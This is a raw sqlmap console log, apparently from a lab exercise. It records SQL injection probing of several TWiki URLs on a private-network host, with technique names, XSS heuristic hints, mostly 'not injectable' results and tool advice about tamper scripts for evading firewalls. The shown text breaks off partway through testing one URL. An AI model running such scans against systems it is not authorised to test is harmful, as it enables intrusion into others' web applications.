[18:39:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebSearch?template=oopsmore¶m1=1.13¶m2=1.13' | |
[18:39:38] [INFO] testing connection to the target URL | |
[18:39:38] [INFO] testing if the target URL is stable | |
[18:39:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:39:39] [INFO] testing if GET parameter 'template' is dynamic | |
[18:39:39] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:39:39] [INFO] GET parameter 'template' is dynamic | |
[18:39:39] [INFO] heuristics detected web page charset 'ascii' | |
[18:39:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:39:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:39:39] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:39:39] [WARNING] reflective value(s) found and filtering out | |
[18:39:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:39:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:39:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:39:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:39:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:39:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:39:42] [INFO] testing 'MySQL inline queries' | |
[18:39:42] [INFO] testing 'PostgreSQL inline queries' | |
[18:39:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:39:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:39:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:39:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:39:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:39:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:39:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:39:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:39:45] [INFO] testing 'Oracle AND time-based blind' | |
[18:39:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:39:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:39:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:39:54] [WARNING] GET parameter 'template' is not injectable | |
[18:39:54] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:39:55] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:39:55] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:39:55] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:39:55] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:39:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:39:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:39:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:39:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:39:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:39:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:39:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:39:59] [INFO] testing 'MySQL inline queries' | |
[18:39:59] [INFO] testing 'PostgreSQL inline queries' | |
[18:39:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:39:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:40:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:40:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:40:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:40:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:40:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:40:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:40:03] [INFO] testing 'Oracle AND time-based blind' | |
[18:40:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:40:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:40:18] [WARNING] GET parameter 'param1' is not injectable | |
[18:40:18] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:40:18] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:40:19] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:40:19] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:40:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:40:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:40:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:40:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:40:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:40:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:40:23] [INFO] testing 'MySQL inline queries' | |
[18:40:23] [INFO] testing 'PostgreSQL inline queries' | |
[18:40:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:40:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:40:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:40:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:40:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:40:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:40:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:40:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:40:26] [INFO] testing 'Oracle AND time-based blind' | |
[18:40:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:40:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:40:37] [INFO] target URL appears to be UNION injectable with 1 columns | |
[18:40:37] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[18:40:42] [WARNING] GET parameter 'param2' is not injectable | |
[18:40:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 39: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiPreferences?t=1441456700 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:40:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiPreferences?t=1441456700' | |
[18:40:42] [INFO] testing connection to the target URL | |
[18:40:42] [INFO] testing if the target URL is stable | |
[18:40:43] [INFO] target URL is stable | |
[18:40:43] [INFO] testing if GET parameter 't' is dynamic | |
[18:40:43] [WARNING] GET parameter 't' does not appear dynamic | |
[18:40:43] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:40:43] [INFO] testing for SQL injection on GET parameter 't' | |
[18:40:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:40:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:40:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:40:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:40:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:40:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:40:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:40:47] [INFO] testing 'MySQL inline queries' | |
[18:40:47] [INFO] testing 'PostgreSQL inline queries' | |
[18:40:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:40:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:40:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:40:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:40:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:40:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:40:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:40:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:40:51] [INFO] testing 'Oracle AND time-based blind' | |
[18:40:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:40:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:40:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:41:04] [WARNING] GET parameter 't' is not injectable | |
[18:41:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 40: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Preferences[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:41:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Preferences[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:41:04] [INFO] testing connection to the target URL | |
[18:41:04] [INFO] testing if the target URL is stable | |
[18:41:05] [INFO] target URL is stable | |
[18:41:05] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:41:05] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:41:05] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:41:05] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:41:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:41:06] [WARNING] reflective value(s) found and filtering out | |
[18:41:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:41:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:41:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:41:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:41:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:41:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:41:09] [INFO] testing 'MySQL inline queries' | |
[18:41:09] [INFO] testing 'PostgreSQL inline queries' | |
[18:41:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:41:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:41:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:41:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:41:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:41:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:41:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:41:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:41:13] [INFO] testing 'Oracle AND time-based blind' | |
[18:41:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:41:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:41:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:41:25] [WARNING] URI parameter '#1*' is not injectable | |
[18:41:25] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 41: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:41:25] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?skin=print' | |
[18:41:25] [INFO] testing connection to the target URL | |
[18:41:26] [INFO] testing if the target URL is stable | |
[18:41:26] [INFO] target URL is stable | |
[18:41:26] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:41:26] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:41:27] [INFO] GET parameter 'skin' is dynamic | |
[18:41:27] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:41:27] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:41:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:41:27] [INFO] heuristics detected web page charset 'ascii' | |
[18:41:27] [WARNING] reflective value(s) found and filtering out | |
[18:41:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:41:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:41:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:41:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:41:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:41:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:41:31] [INFO] testing 'MySQL inline queries' | |
[18:41:32] [INFO] testing 'PostgreSQL inline queries' | |
[18:41:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:41:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:41:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:41:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:41:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:41:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:41:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:41:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:41:36] [INFO] testing 'Oracle AND time-based blind' | |
[18:41:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:41:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:41:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:41:53] [WARNING] GET parameter 'skin' is not injectable | |
[18:41:53] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 42: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.48&rev2=1.47 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:41:53] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.48&rev2=1.47' | |
[18:41:53] [INFO] testing connection to the target URL | |
[18:41:53] [INFO] testing if the target URL is stable | |
[18:41:54] [INFO] target URL is stable | |
[18:41:54] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:41:54] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:41:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:41:54] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[18:41:54] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:41:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:41:54] [WARNING] reflective value(s) found and filtering out | |
[18:41:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:41:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:41:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:41:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:41:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:41:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:41:58] [INFO] testing 'MySQL inline queries' | |
[18:41:58] [INFO] testing 'PostgreSQL inline queries' | |
[18:41:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:41:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:41:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:41:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:41:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:42:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:42:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:42:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:42:01] [INFO] testing 'Oracle AND time-based blind' | |
[18:42:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:42:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:42:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:42:14] [WARNING] GET parameter 'rev1' is not injectable | |
[18:42:14] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:42:14] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[18:42:14] [INFO] GET parameter 'rev2' is dynamic | |
[18:42:14] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:42:14] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[18:42:14] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:42:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:42:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:42:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:42:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:42:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:42:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:42:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:42:19] [INFO] testing 'MySQL inline queries' | |
[18:42:20] [INFO] testing 'PostgreSQL inline queries' | |
[18:42:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:42:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:42:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:42:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:42:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:42:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:42:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:42:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:42:24] [INFO] testing 'Oracle AND time-based blind' | |
[18:42:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:42:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:42:37] [WARNING] GET parameter 'rev2' is not injectable | |
[18:42:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 43: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.47 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:42:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.47' | |
[18:42:37] [INFO] testing connection to the target URL | |
[18:42:37] [INFO] testing if the target URL is stable | |
[18:42:38] [INFO] target URL is stable | |
[18:42:38] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:42:38] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:42:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:42:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:42:39] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:42:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:42:39] [WARNING] reflective value(s) found and filtering out | |
[18:42:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:42:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:42:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:42:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:42:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:42:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:42:43] [INFO] testing 'MySQL inline queries' | |
[18:42:43] [INFO] testing 'PostgreSQL inline queries' | |
[18:42:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:42:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:42:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:42:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:42:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:42:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:42:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:42:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:42:46] [INFO] testing 'Oracle AND time-based blind' | |
[18:42:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:42:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:42:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:43:01] [WARNING] GET parameter 'rev' is not injectable | |
[18:43:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:43:01] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.47&rev2=1.46' | |
[18:43:01] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.46' | |
URL 44: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiPreferences?template=oopsmore¶m1=1.48¶m2=1.48 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:43:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiPreferences?template=oopsmore¶m1=1.48¶m2=1.48' | |
[18:43:01] [INFO] testing connection to the target URL | |
[18:43:02] [INFO] testing if the target URL is stable | |
[18:43:03] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:43:03] [INFO] testing if GET parameter 'template' is dynamic | |
[18:43:03] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:43:03] [INFO] GET parameter 'template' is dynamic | |
[18:43:03] [INFO] heuristics detected web page charset 'ascii' | |
[18:43:03] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:43:03] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:43:03] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:43:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:43:03] [WARNING] reflective value(s) found and filtering out | |
[18:43:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:43:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:43:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:43:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:43:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:43:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:43:06] [INFO] testing 'MySQL inline queries' | |
[18:43:06] [INFO] testing 'PostgreSQL inline queries' | |
[18:43:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:43:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:43:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:43:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:43:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:43:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:43:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:43:08] [INFO] testing 'Oracle AND time-based blind' | |
[18:43:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:43:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:43:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:43:18] [WARNING] GET parameter 'template' is not injectable | |
[18:43:18] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:43:18] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:43:18] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:43:18] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:43:18] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:43:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:43:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:43:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:43:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:43:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:43:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:43:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
